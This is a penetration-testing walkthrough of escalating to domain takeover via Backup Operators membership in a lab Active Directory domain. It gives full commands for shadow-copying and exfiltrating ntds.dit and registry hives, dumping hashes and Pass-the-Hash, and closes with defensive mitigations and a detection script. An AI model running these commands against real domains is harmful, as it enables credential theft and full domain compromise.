Windows Privilege Escalation: SeBackupPrivilege
Introduction & Overview
The Backup Operators group is a default built-in security group in every Windows Active Directory domain. Members are granted two powerful Windows privileges — SeBackupPrivilege and SeRestorePrivilege — which were designed to allow trusted personnel to back up and restore files regardless of normal NTFS permissions. While legitimate in intent, these privileges can be weaponised by an attacker to extract the Active Directory database (ntds.dit) from a Domain Controller, thereby obtaining every password hash in the domain.
This article documents a complete end-to-end attack chain against the ignite.local test domain using the Backup Operators misconfiguration. It covers four different techniques to add a low-privileged user to the group, exploitation via DiskShadow and robocopy, offline hash extraction with Impacket, and finally a Pass-the-Hash login as Domain Administrator.
The attacker already possesses the Domain Administrator credentials (administrator / Ignite@987), which is a realistic scenario after initial compromise — for example through Kerberoasting, LLMNR poisoning, or AS-REP roasting. The goal is to demonstrate how a new low-privilege user can be elevated via the Backup Operators group and used to fully compromise the domain.
Table of Contents
- Introduction & Overview
- Attack Prerequisites & Lab Setup
- Creating a Domain User Account
- Adding the User to Backup Operators
- Method 1: Active Directory Users and Computers (GUI)
- Method 2: BloodyAD
- Method 3: net rpc (Samba Tools)
- Method 4: Python LDAP Script (addusertogroup.py)
- Verifying Group Membership
- Method A: BloodyAD — msds-memberTransitive
- Method B: net rpc group members
- Method C: ldeep LDAP Query
- Exploitation
- Remote Access via Evil-WinRM
- Shadow Copy & ntds.dit Extraction
- Method 1: Creating the DiskShadow Script
- Uploading and Executing DiskShadow
- Copying ntds.dit
- Saving the SYSTEM Registry Hive
- Downloading Files to Kali
- Dumping NTLM Hashes with impacket-secretsdump
- Pass-the-Hash as Administrator
- Alternative Methods
- Method 2: NetExec
- Method 3: impacket-reg + SMB Server
- Starting SMB Server on Kali
- Remote Registry Backup
- Extracting Hashes with pypykatz
- Gaining Shell via impacket-psexec
- Defensive Mitigations
- Summary
Attack Prerequisites & Lab Setup

Creating a Domain User Account
The first step is to create a new standard domain user account named raj with the password Password@1. This is done from the Domain Controller’s command prompt using the net user command with the /domain flag, which writes the account directly into Active Directory.
Command executed on the Domain Controller (cmd.exe as Administrator):
net user raj Password@1 /add /domain

Adding the User to Backup Operators
The Backup Operators group (CN=Backup Operators,CN=Builtin) is a domain-local security group. Any member inherits SeBackupPrivilege and SeRestorePrivilege. Below are four different methods to perform this operation, which are useful in different attack scenarios depending on which tools and protocols are available.
Method 1: Active Directory Users and Computers (GUI)
The most straightforward approach applies when you already have an RDP session or console access to the DC.
- Open ADUC — Launch dsa.msc (Active Directory Users and Computers) on a Domain Controller or admin machine
- Locate the user — Navigate to the Users container and find the user raj
- Right-click the user — A context menu appears with multiple options
- Click “Add to a group…” — This is the highlighted option (boxed in red), which opens the group selection dialog
- Type group name — In the dialog that follows, type Backup Operators and click OK
- Confirm — A success message confirms raj is now a member of Backup Operators


Method 2: BloodyAD
BloodyAD is a Python tool that communicates directly with the AD LDAP/MS-RPC interfaces and can modify group memberships without requiring a domain-joined machine. From the Kali attacker machine:
bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' add groupMember "Backup Operators" raj

Method 3: net rpc (Samba tools)
The Samba suite includes net, which can interact with Windows RPC endpoints. The group addmem subcommand adds a user to an AD group remotely via the SAMR (Security Account Manager Remote) protocol.
net rpc group addmem "Backup Operators" "raj" -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11

Method 4: Python LDAP Script (addusertogroup.py)
A custom Python script leveraging the ldap3 library can also modify group membership. This is useful in environments where other tools are blocked or where you need to embed the operation in a larger automation pipeline.
python3 addusertogroup.py -d ignite.local -g "Backup Operators" -a raj -u administrator -p Ignite@987

Verifying Group Membership
Before proceeding with exploitation, confirm that raj is now a member of the Backup Operators group. Three verification methods are shown below.
Method A: BloodyAD — msds-memberTransitive
bloodyAD --host 192.168.1.11 -d ignite.local -u ankur -p Password@1 get object "Backup Operators" --attr msds-memberTransitive

Method B: net rpc group members
net rpc group members "Backup Operators" -U ignite.local/ankur%'Password@1' -S 192.168.1.11

Method C: ldeep LDAP Query

All three methods confirm that raj is now a member of Backup Operators. Note that membership changes propagate almost instantly in a lab environment, but in production domains there may be a short replication delay across DCs.
Exploitation
Remote Access via Evil-WinRM
Evil-WinRM is a Ruby-based shell that communicates over WS-Management (WinRM / TCP 5985). It provides an interactive PowerShell session and includes file upload/download capabilities, which will be essential later in the attack.
evil-winrm -i 192.168.1.11 -u raj -p Password@1
After connecting, run whoami /priv to inspect the enabled privileges:
The two critical privileges are confirmed as Enabled: SeBackupPrivilege allows reading any file regardless of its ACL, and SeRestorePrivilege allows writing any file. Together they enable extraction of locked system files such as ntds.dit.

Shadow Copy & ntds.dit Extraction
ntds.dit is the Active Directory database file located at C:\Windows\NTDS\ntds.dit. Even with SeBackupPrivilege, the file cannot be directly copied while the NTDS service is running because it is exclusively locked by the Extensible Storage Engine. The solution is to use the Volume Shadow Copy Service (VSS) to create a point-in-time snapshot of the C: volume, then read ntds.dit from the snapshot.
DiskShadow.exe is a Microsoft-signed tool built into Windows Server that automates VSS operations using a script file. Create the following script on Kali:
nano raj.dsh
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
Script line-by-line explanation:
- set context persistent nowriters – Create a persistent shadow copy that survives reboots, excluding VSS writers (faster).
- add volume c: alias raj – Add the C: volume to the shadow set and alias the resulting snapshot as ‘raj’.
- create – Create the shadow copy.
- expose %raj% z: – Mount the snapshot as drive Z: so it is accessible as a normal drive letter.
Convert the script to Windows (CRLF) line endings before uploading:
unix2dos raj.dsh

Uploading and Executing DiskShadow
Back in the Evil-WinRM session, create a working directory, upload the script, and run it:
upload raj.dsh
diskshadow /s raj.dsh

The shadow copy is now accessible at Z:\. This is an exact read-only clone of C: at the moment of snapshot creation, bypassing all file locks held by running services.
Copying ntds.dit
robocopy with the /b flag uses Backup semantics — it explicitly requests SeBackupPrivilege for the copy operation, which allows it to bypass the NTFS ACL on ntds.dit.
robocopy /b z:\windows\ntds . ntds.dit

Saving the SYSTEM Registry Hive
ntds.dit is encrypted with the PEK (Password Encryption Key), which itself is protected by the boot key (SysKey) stored in the SYSTEM registry hive. Without this hive, the hashes cannot be decrypted. Save it to disk:
reg save hklm\system c:\Temp\system

Downloading Files to Kali
With ntds.dit copied from the shadow copy and the SYSTEM hive saved with reg save, both files now sit in the Temp directory and can be transferred to Kali Linux using Evil-WinRM's download command.
download ntds.dit
download system

Dumping NTLM Hashes with impacket-secretsdump
Finally, on the Kali Linux shell, use Impacket’s secretsdump to extract password hashes from the ntds.dit file and SYSTEM hive:
impacket-secretsdump -ntds ntds.dit -system system local

Pass-the-Hash as Administrator
With the Administrator NT hash in hand, a Pass-the-Hash (PtH) attack can be performed. Evil-WinRM supports NTLM hash authentication via the -H flag, eliminating the need to crack the hash or know the plaintext password.
evil-winrm -i 192.168.1.11 -u administrator -H 32196b56ffe6f45e294117b91a83bf38

Method 2: NetExec
NetExec includes a dedicated backup_operator module that automates the entire registry backup and hash dumping flow in a single command. It uses Backup Operators membership to remotely save the SAM, SYSTEM, and SECURITY hives to SYSVOL and retrieves them automatically.
nxc smb 192.168.1.11 -u raj -p Password@1 -M backup_operator

Method 3: impacket-reg + SMB Server
impacket-reg allows remote registry operations over SMB/DCE-RPC. Combined with impacket-smbserver hosting a writable share on the Kali machine, this approach saves the hives directly to the attacker without touching the DC’s local disk.
Step 1 — Start an SMB server on Kali
impacket-smbserver share $(pwd) -smb2support

Remote Registry Backup
Dump the SAM and SYSTEM hives from the target machine with the impacket-reg tool, writing the backup directly to the share hosted on Kali.

The three hive files (SAM.save, SYSTEM.save, SECURITY.save) are written directly to the attacker’s share, where they can be parsed offline with impacket-secretsdump or pypykatz. Here, pypykatz extracts the NTLM password hashes from the dumped SAM and SYSTEM files:
pypykatz registry --sam SAM.save SYSTEM.save

Finally, use impacket-psexec to gain a shell on the target machine as an administrator user using the extracted hash, achieving privilege escalation on the Windows Domain Controller.
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32196b56ffe6f45e294117b91a83bf38 administrator@192.168.1.48

Defensive Mitigations
Understanding how this attack works allows defenders to implement effective controls. The following measures significantly reduce the risk of Backup Operators abuse.
Audit Backup Operators Membership
The Backup Operators group should be nearly empty in most environments. Regularly audit its membership with PowerShell or BloodHound, and investigate any unexpected member immediately. Run Get-ADGroupMember -Identity "Backup Operators" on a schedule and compare the result against the expected list.
Restrict WinRM (TCP 5985/5986)
Block WinRM access from non-administrative workstations using Windows Firewall GPO. Consider requiring a jump host or PAW (Privileged Access Workstation) for all administrative remote connections to Domain Controllers.
Enable Advanced Audit Policies
Enable Audit Sensitive Privilege Use (Event IDs 4672, 4673) to detect when SeBackupPrivilege is assigned or exercised. Also monitor Event ID 4732 (member added to a security-enabled local group) in the Security log and Event ID 8222 (VSS shadow copy created) in the Application log.
Credential Guard & Protected Users
Enable Windows Defender Credential Guard and place privileged accounts in the Protected Users security group. Protected Users members cannot use NTLM authentication, which defeats Pass-the-Hash attacks.
Tiered Administration Model
Implement Microsoft’s Privileged Access Model (PAM) / Tier 0 model. Domain Controller management should only be performed from Tier 0 PAWs using dedicated admin accounts that are never used on lower-tier systems.
Monitor DiskShadow and robocopy Usage
Alert on diskshadow.exe execution on Domain Controllers (it has no legitimate regular use). Similarly alert on robocopy executions that target NTDS or system hive paths. Use Sysmon Event ID 1 (Process Create) with appropriate filters.
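The audit-policy and DiskShadow/robocopy monitoring mitigations above, as an added example that is not part of the original article: a small Python rule set run over constructed sample events. The field names follow the Windows Security (4732, 4672) and Sysmon (Event ID 1) schemas; the allowlist of accounts expected to hold backup privileges is an assumption to be maintained per environment.

```python
import re

# Constructed sample events shaped like fields parsed from Security/Sysmon event
# XML (not real log data from the lab described in the article).
SAMPLE_EVENTS = [
    {"EventID": 4732, "SubjectUserName": "administrator",
     "MemberName": "CN=raj,CN=Users,DC=ignite,DC=local",
     "TargetUserName": "Backup Operators"},
    {"EventID": 4672, "SubjectUserName": "raj",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"EventID": 4672, "SubjectUserName": "svc-backup",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege"},
    {"EventID": 1, "Image": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": "diskshadow /s raj.dsh"},
    {"EventID": 1, "Image": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy /b z:\windows\ntds . ntds.dit"},
    {"EventID": 1, "Image": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy /e C:\Shares\Finance D:\Backup"},
]

# Assumed allowlist: accounts expected to receive SeBackupPrivilege on a DC.
# 4672 fires for every privileged logon, so this list is what keeps the rule quiet.
ALLOWED_BACKUP_ACCOUNTS = {"svc-backup"}
# NTDS directory and SYSTEM hive paths that a copy tool should never touch.
SENSITIVE_PATHS = re.compile(r"(\\ntds\b|hklm\\system|\\config\\system)", re.I)

def detect(events, allowed=ALLOWED_BACKUP_ACCOUNTS):
    """Return (rule, detail) tuples for events matching the mitigations above."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4732 and ev.get("TargetUserName", "").lower() == "backup operators":
            alerts.append(("backup_operators_member_added",
                           f"{ev['SubjectUserName']} added {ev['MemberName']}"))
        elif eid == 4672 and "SeBackupPrivilege" in ev.get("PrivilegeList", "").split():
            if ev.get("SubjectUserName", "").lower() not in allowed:
                alerts.append(("sebackup_assigned_unexpected_account", ev["SubjectUserName"]))
        elif eid == 1:
            image, cmd = ev.get("Image", "").lower(), ev.get("CommandLine", "")
            if image.endswith("\\diskshadow.exe"):
                alerts.append(("diskshadow_on_dc", cmd))
            elif image.endswith(("\\robocopy.exe", "\\reg.exe")) and SENSITIVE_PATHS.search(cmd):
                alerts.append(("sensitive_path_copy", cmd))
    return alerts

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[ALERT] {rule}: {detail}")
```

The ordinary robocopy job and the allowlisted service account produce no alert, while the group change, the unexpected privilege assignment, the DiskShadow run and the NTDS copy each do.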
LAPS and Unique Local Credentials
Deploy Microsoft LAPS (Local Administrator Password Solution) to prevent lateral movement using shared local administrator passwords. This limits the blast radius even if a hash is extracted.
Regular ntds.dit Integrity Monitoring
Use File Integrity Monitoring (FIM) tools to alert when ntds.dit or the SYSTEM hive is accessed by processes other than the NTDS service. Microsoft Defender for Identity (MDI) provides this capability out of the box for AD environments.
Summary
This article demonstrated a complete Active Directory domain compromise stemming from a single misconfiguration: an account being a member of the built-in Backup Operators group. The attack required no exploit, no vulnerability, and no zero-day — only the privileges that Windows grants to every member of this group by design.
Awesome! Thank you 😀
Thank you Raj sir and team for writing this; it was great assistance in solving a Capstone exercise.
Amazing walkthrough. Solving an HTB machine and all other walkthroughs just confused me more, but this one is hands down the best! Thank you!